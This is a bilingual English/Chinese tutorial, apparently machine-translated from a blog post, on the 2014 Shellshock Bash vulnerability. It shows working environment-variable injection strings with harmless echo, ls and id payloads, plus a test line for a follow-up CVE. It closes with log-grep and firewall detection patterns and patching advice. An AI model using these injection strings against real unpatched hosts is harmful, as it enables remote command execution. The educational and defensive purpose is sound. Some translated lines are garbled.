本文回顾了著名的Shellshock漏洞,它曾对全球系统安全构成威胁。内容来源于对原文的翻译,探讨了该漏洞的影响和重要性。
shellshock
Sold) type of OS Command Injection was reported. The Shellshock vulnerability, also known as CVE-2014–6271, allowed attackers to inject their own code into Bash using specially crafted environment variables. It was a horror. But a horrific beautiful vuln.
报告了旧的OS命令注入类型。 Shellshock漏洞(也称为CVE-2014–6271 )使攻击者可以使用特制环境变量将自己的代码注入Bash 。 真是恐怖。 可是一个可怕的美丽伤口。
Bash supports exporting not just shell variables, but also shell functions to other bash instances, via the process environment to(indirect) child processes. Current bash versions use an environment variable named by the function name, and a function definition starting with “() {” in the variable value to propagate function definitions through the environment. The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function definition.
Bash不仅支持将shell变量导出,而且还通过过程环境将shell函数导出到其他bash实例(间接)到子进程。 当前的bash版本使用以函数名称命名的环境变量,以及在变量值中以“(){”开头的函数定义,以在环境中传播函数定义。 发生此漏洞是因为bash在处理函数定义后不会停止; 它会继续按照函数定义来解析和执行shell命令。
For example, an environment variable setting VAR=(){ignored;}/bin/id would execute /bin/id when the environment is imported into the Bash process. The caveat is that the PATH variable could not have been set up yet, and Bash could crash after executing /bin/id, but the damage has already happened at this point.
例如,当环境导入到Bash进程中时,设置VAR=(){ignored;}/bin/id的环境变量将执行/bin/id 。 需要注意的是,尚未设置PATH变量,并且Bash在执行/bin/id之后可能崩溃,但是此时损坏已经发生。
The fact that an environment variable with an arbitrary name could be used as a carrier for a malicious function definition containing trailing commands made this vulnerability particularly severe, enabling network-based exploitation.
具有任意名称的环境变量可以用作包含尾随命令的恶意功能定义的载体,这一事实使此漏洞特别严重,从而可以进行基于网络的利用。
Even scarier, the NIST vulnerability database has rated this vulnerability “10 out of 10” in terms of severity, and there were claims that Shellshock attacks could have top one Billion. Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about Shellshock went public last week!.
NIST漏洞数据库甚至更可怕,其严重程度将其评为“十分之十” ,并且有人声称Shellshock攻击可能排名前十亿 。 在上周有关Shellshock的消息公开后不到24小时,就发现了针对Shellshock的DDoS攻击和IRC机器人! 。
很讨厌的东西,对吧? (Pretty nasty stuff, huh?)
了解Bash Shell (Understanding the Bash Shell)
To understand this vulnerability, we need to know how Bash handles functions and environment variables. The GNU Bourne Again shell (BASH) is a Unix shell and command language interpreter. It was released in 1989 by Brian Fox for the GNU Project as a free software replacement for the Bourne shell (which was born back in 1977).
要了解此漏洞,我们需要了解Bash如何处理函数和环境变量。 GNU Bourne Again shell(BASH)是Unix shell和命令语言解释器 。 它是由Brian Fox在1989年为GNU项目发布的,它是Bourne shell (它诞生于1977年)的免费软件替代品。
$ man bashNAME
bash - GNU Bourne-Again SHell
SYNOPSIS
bash [options] [file]
COPYRIGHT
Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.
DESCRIPTION
Bash is a sh-compatible command language interpreter that executes commands read from the standard input or from a file. Bash also incorporates useful features from the Korn and C shells (zsh and csh).
(...)Of course, there are other command shells out there. However, Bash is the out-of-the-box shell for most of the Linux systems (and Linux-based systems), including many Debian-based distributions and the Red Hat & Fedora & CentOS combo.
当然,还有其他命令外壳 。 但是,Bash是大多数Linux系统(和基于Linux的系统)的现成外壳,包括许多基于Debian的发行版以及Red Hat&Fedora&CentOS组合。
Bash中的功能 (Functions in Bash)
What is interesting about Bash is that it is also a scripting language, with the ability to define functions. This is super useful when you are writing scripts. For example, hello.sh:
Bash有趣的是,它也是一种脚本语言,具有定义功能的能力。 在编写脚本时,这非常有用。 例如, hello.sh :
#!/bin/bash
function hello {
echo Hello!
}
hellowhich can be called with:
可以这样调用:
$ chmod a+x hello.sh
$ ./hello.shHello!A function in Bash may be compacted into a single line. You just need to choose a name and put a
()after it. Everything inside{}will belong to the scope of your function.Bash中的功能可以压缩为一行。 您只需要选择一个名称并在其后加上
()。{}所有内容都将属于您的函数范围。
For example, we can create a function bashiscool that uses echo to display the message on the standard output:
例如,我们可以创建一个函数bashiscool ,该函数使用echo在标准输出上显示消息:
$ bashiscool() { echo "Bash is actually Fun"; }
$ bashiscoolBash is actually Fun 子进程和export命令 (Child Processes and the export command)
We can make things even more interesting. The statement bash -c can be used to execute a new instance of Bash, as a subprocess, to run new commands (-c passes a string with a command). The catch is that the child process does not inherit the functions or variables that we defined in the parent:
我们可以使事情变得更加有趣。 语句bash -c可作为子进程用于执行Bash的新实例,以运行新命令( -c随命令传递字符串)。 问题在于子进程不继承我们在父进程中定义的函数或变量:
$ bash -c bashiscool # spawn nested shellbash: bashiscool: command not foundSo before executing a new instance of Bash, we need to export the environment variables to the child. That’s why we need the export command. In the example below, the flag -f means read key bindings from filename:
因此,在执行新的Bash实例之前,我们需要将环境变量导出到子级。 这就是为什么我们需要export命令。 在下面的示例中,标志-f表示从filename读取键绑定 :
$ export -f bashiscool
$ bash -c bashiscool # spawn a nested shellBash is actually FunIn other words, first, the export command creates a regular environment variable containing the function definition. Then, the second shell reads the environment. If it sees a variable that looks like a function, it evaluates this function!
换句话说,首先, export命令创建一个包含函数定义的常规环境变量 。 然后,第二个外壳读取环境。 如果看到一个看起来像一个函数的变量,它将对该函数求值!
环境变量的简单示例 (A Simple Example of an Environment Variable)
Let’s see how environment variables work examining some builtin Bash command. For instance, a very popular one, grep, is used to search for patterns in files (or the standard input).
L等人通过检查一些内置的 Bash命令来了解环境变量如何工作。 例如,一种非常流行的grep用于搜索文件(或标准输入)中的模式。
Running grep in a file that contains the word, 'fun' will return the line where this word is. Running grep with a flag -v will return the non-matching lines, i.e., the lines where the word 'fun' does not appear:
在包含单词“ fun”的文件中运行grep将返回该单词所在的行。 运行带有标志-v grep将返回不匹配的行, 即不出现单词“ fun”的行:
$ echo 'bash can be super fun' > file.txt$ echo 'bash can be dangerous' >> file.txt$ cat file.txt
bash can be super fun
bash can be dangerous$ grep fun file.txt
bash can be super fun$ grep -v fun file.txt
bash can be dangerousThe grep command uses an environment variable called GREP_OPTIONS to set default options. This variable is usually set to:
grep命令使用名为GREP_OPTIONS的环境变量来设置默认选项。 此变量通常设置为:
$ echo $GREP_OPTIONS--color=autoTo update or create a new environment variable, it is not enough to use the Bash syntax GREP_OPTIONS='-v', but instead, we need to call the builtin export:
要更新或创建新的环境变量,仅使用Bash语法GREP_OPTIONS='-v'是不够GREP_OPTIONS='-v' ,相反,我们需要调用内置 export :
$ GREP_OPTIONS='-v'$ grep fun file.txt
bash can be super fun$ export GREP_OPTIONS='-v'$ grep fun file.txt
bash can be dangerous env命令 (The env command)
Another Bash builtin, the env prints the environment variables. But it can also be used to run a single command with an exported variable (or variables) given to that command. In this case, env starts a new process, then it modifies the environment, and then it calls the command that was provided as an argument (the env process is replaced by the command process).
另一个内置的Bash, env打印环境变量。 但是,它也可以用于运行单个命令,并为该命令提供导出的变量(或多个变量)。 在这种情况下, env启动一个新进程,然后修改环境,然后调用作为参数提供的命令( env进程被命令进程替换)。
In practice, to use env to run commands, we:
实际上,要使用env运行命令,我们:
set the environment variable value with env,
用env设置环境变量值,
spawn a new shell using bash -c,
使用bash -c产生一个新的shell,
pass the command/function we want to run (for example, grep fun file.txt).
传递我们要运行的命令/功能(例如grep fun file.txt)。
For example, this does not work; we need another shell:
例如,这不起作用。 我们需要另一个外壳:
$ env GREP_OPTIONS='-v' | grep fun file.txtbash can be super funHere we go:
开始了:
$ env GREP_OPTIONS='-v' bash -c 'grep fun file.txt'bash can be dangerous面对Shellshock漏洞 (Facing the Shellshock Vulnerability)
What if we pass some function to the variable definition?
如果我们将一些函数传递给变量定义怎么办?
$ env GREP_OPTIONS='() { :;};' bash -c 'grep fun file.txt'grep: {: No such file or directory
grep: :;};: No such file or directory
grep: fun: No such file or directorySince the things we added are strange when parsed to the command grep, it won’t understand them.
由于我们添加的内容在解析到命令grep时很奇怪,因此无法理解。
What if we add stuff after the function? Things start to get weirder:
如果我们在函数后添加内容怎么办? 事情开始变得奇怪:
$ env GREP_OPTIONS='-v () { :;}; echo NOOOOOOOOOOOOOOO!' bash -c
'grep fun file.txt'grep: {: No such file or directory
grep: :;};: No such file or directory
grep: echo: No such file or directory
grep: NOOOOOOOOOOOOOOO!: No such file or directory
grep: fun: No such file or directory
file.txt:bash can be super fun
file.txt:bash can be dangerousDid you notice the confusion? Both matches and non-matches were printed! It means that some stuff was parsed well! When in doubt, Bash appears to do everything?
您注意到混乱了吗? 两场比赛和非比赛被印! 这意味着某些东西解析得很好! 如有疑问,Bash似乎可以做所有事情 ?
Now, what if we just keep the function, taking out the only thing that makes sense, -v?
现在,如果我们只保留函数,而取出唯一有意义的-v呢?
$ env GREP_OPTIONS='() { :;}; echo NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt'NOOOOOOOOOOOOOOO!
grep: {: No such file or directory
grep: :: No such file or directory
grep: }: No such file or directory
grep: fun: No such file or directoryDid you notice that
echo NOOOOOOOOOOOOOOO!was executed normally? This is the (first) Shellshock bug!您是否注意到
echo NOOOOOOOOOOOOOOO!被正常执行了吗? 这是(第一个)Shellshock错误!
The above works because when the new shell sees an environment variable beginning with (), it gets the variable name and executes the string following it. This includes running anything after the function, i.e., the evaluation does not stop when the end of the function definition is reached!
上面的方法起作用是因为当新的外壳程序看到以()开头的环境变量时,它将获取变量名称并执行其后的字符串。 这包括在函数之后执行任何操作, 即 ,到达函数定义的末尾时评估不会停止!
Remember that echo is not the only thing we can do. The possibilities are unlimited! For example, we can issue any /bin command:
请记住, echo不是我们唯一能做的。 可能性是无限的! 例如,我们可以发出任何/bin命令:
$ env GREP_OPTIONS='() { :;}; /bin/ls' bash -c 'grep fun file.txt'anaconda certificates file.txt IPython
(...)哇。 (WOW.)
Worse, we actually don’t need to use a system environment variable nor even call a real command:
更糟糕的是,我们实际上不需要使用系统环境变量,甚至不需要调用真实的命令:
$ env test='() { :;}; echo STILL NOOOOOOOO!!!!' bash -c :
STILL NOOOOOOOO!!!!In the example above, env runs a command with arbitrary variable (test) set to some function (in this case is just a single :, a Bash command defined as doing nothing). The semi-colon signals the end of the function definition.
在上面的示例中, env运行将任意变量(测试)设置为某个函数的命令(在这种情况下,该命令只是单个: ,一个Bash命令定义为不执行任何操作)。 分号表示函数定义的结尾。
Again, the bug is in the fact that there's nothing stopping the parsing of what is after the semi-colon!
再次,该错误是因为事实上没有什么可以阻止分号后面的内容的解析!
不止一个! (There is more than one!)
The Shellshock vulnerability is an example of arbitrary code execution (ACE) vulnerability, which is executed on running programs.
An attacker will use an ACE vulnerability to run a program that gives her a simple way of controlling the targeted machine. This is nicely achieved by running a Shell such as Bash.
攻击者将使用ACE漏洞运行程序,从而为她提供了一种控制目标计算机的简单方法。 通过运行诸如Bash之类的Shell可以很好地实现这一点。
It is not surprising that right after a patch for CVE-2014–6271 was released, several new issues were opened:
毫不奇怪,在发布CVE-2014–6271的补丁程序之后,又出现了几个新问题:
CVE-2014–7169: Right after the first bug was disclosed, a tweet from Tavis Ormandy showed a further parser error that became the second vulnerability:
CVE-2014–7169 :在发现第一个错误之后, Tavis Ormandy的一条推文显示了另一个解析器错误 ,该错误成为第二个漏洞:
$ env X='() { (a)=>\' bash -c "echo vulnerable"; bash -c "echo Bug CVE-2014-7169 patched"vulnerableCVE-2014–7186 and CVE-2014–7187: A little after the second bug, two other bugs were found by Florian Weimer. One concerning out of bound memory read error in redir_stack and the other an off-by-one error in nested loops. You can check these vulnerabilities in your system with this script
CVE-2014–7186和CVE-2014–7187 :在第二个bug出现不久后, Florian Weimer发现了另外两个bug。 一个在redir_stack中涉及超出范围的内存读取错误 ,另一个在嵌套循环中涉及一个一一错误 。 您可以使用此脚本检查系统中的这些漏洞
CVE 2014–6277 and CVE 2014–6278: A couple of days ago, these new bugs were found by Michal Zalewski.
CVE 2014–6277和CVE 2014–6278 :几天前, Michal Zalewski发现了这些新错误。
保护系统免受类似漏洞影响的建议 (Suggestions to Protect Your System against similar vulnerabilities)
Update your system! And keep updating it… Many Linux distributions have released new Bash software versions, so follow the instructions of your distribution.
更新您的系统! 并不断更新…许多Linux发行版都发布了新的Bash软件版本,因此请遵循发行版中的说明。
- Update firmware on your router or any other web-enabled devices as soon as they become available. Remember to only download patches from reputable sites (only HTTPS please!), since scammers will likely try to take advantage of Shellshock reports. 路由器或任何其他启用Web的设备上的固件更新后,请尽快进行更新。 切记只能从信誉良好的网站下载补丁程序(请仅使用HTTPS!),因为诈骗者可能会尝试利用Shellshock报告。
- Keep an eye on all of your accounts for signs of unusual activity. Consider changing important passwords. 密切注意您所有帐户的异常活动迹象。 考虑更改重要密码。
HTTP requests to CGI scripts have been identified as the major attack vector. Disable any scripts that call on the shell (however, it does not fully mitigate the vulnerability). To check if your system is vulnerable, you can use this online scanner. Consider mod_security if you’re not already using it.
对CGI脚本的HTTP请求已被识别为主要攻击媒介。 禁用所有在Shell上调用的脚本(但是,它不能完全缓解漏洞)。 要检查系统是否容易受到攻击,可以使用此在线扫描仪 。 如果尚未使用mod_security ,请考虑使用它。
Because the HTTP requests used by Shellshock exploits are quite unique, monitor logs with keywords such as
grep '() {' access_logorcat access_log |grep "{ :;};". Some common places for HTTP logs are:cPanel: /usr/local/apache/domlogs/,Debian/Apache: /var/log/apache2/, orCentOS: /var/log/httpd/.由于Shellshock漏洞利用的HTTP请求非常独特,因此请使用诸如
grep '() {' access_log或cat access_log |grep "{ :;};"关键字监视日志cat access_log |grep "{ :;};"。 HTTP日志的一些常见位置是:cPanel: /usr/local/apache/domlogs/,Debian/Apache: /var/log/apache2/或CentOS: /var/log/httpd/。Firewall and network filters can be set to block requests that contain a signature for the attack, i.e.
“() {“.可以将防火墙和网络过滤器设置为阻止包含包含攻击签名的请求, 即
“() {“。In the case of an attack, publish the attacker’s information! You can use awk and uniq (where print $1 means print the first column) to get her IP, for example:
如果发生攻击,请发布攻击者的信息! 您可以使用awk和uniq (其中print $ 1表示打印第一列)来获取其IP,例如:
$ cat log_file |grep "{ :;};" | awk '{print $1}'|uniqIf you are on a managed hosting subscription, check your company’s status. For example, Acquia, Heroku, Mediatemple, and Rackspace.
如果您使用托管托管订阅,请检查公司的状态。 例如, Acquia , Heroku , Mediatemple和Rackspace 。
- Update your Docker containers and AWS instances. 更新您的Docker容器和AWS实例。
If you are running production systems that don’t need exported functions at all, take a look at this wrapper that refuses to run bash if any environment variable’s value starts with a left-parent.
如果您正在运行的生产系统根本不需要导出的功能,请查看此包装器 ,如果任何环境变量的值都以左父母开头,则该包装器拒绝运行bash。
学习参考 (Learning References)
评论 (Reviews)
http://lcamtuf.blogspot.co.uk/2014/09/quick-notes-about-bash-bug-its-impact.html
http://lcamtuf.blogspot.co.uk/2014/09/quick-notes-about-bash-bug-its-impact.html
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNbefmSx8G
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNbefmSx8G
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
错误说明 (Bugs Description)
概念验证攻击 (Proof-of-Concept Attacks)
http://research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html
http://research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html
https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html
https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept
https://isc.sans.edu/forums/diary/Shellshock+A+Collection+of+Exploits+seen+in+the+wild/18725
https://isc.sans.edu/forums/diary/Shellshock+A+Collection+of+Exploits+seen+in+the+wild/18725
感谢您的阅读! (Thank you for reading!)
I hope this post sheds a bit of light on how OS Command Injection vulnerabilities work, empowering hackers and developers to experiment and innovate more!
我希望这篇文章对OS Command Injection漏洞的工作方式有所启发,使黑客和开发人员有能力进行更多的尝试和创新!
Resources and source codes related to this tutorial are available here.
与本教程相关的资源和源代码可在此处获得 。
翻译自: https://medium.com/python-for-the-utopian/remembering-the-shellshock-vulnerability-403626af44a5
shellshock
461
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
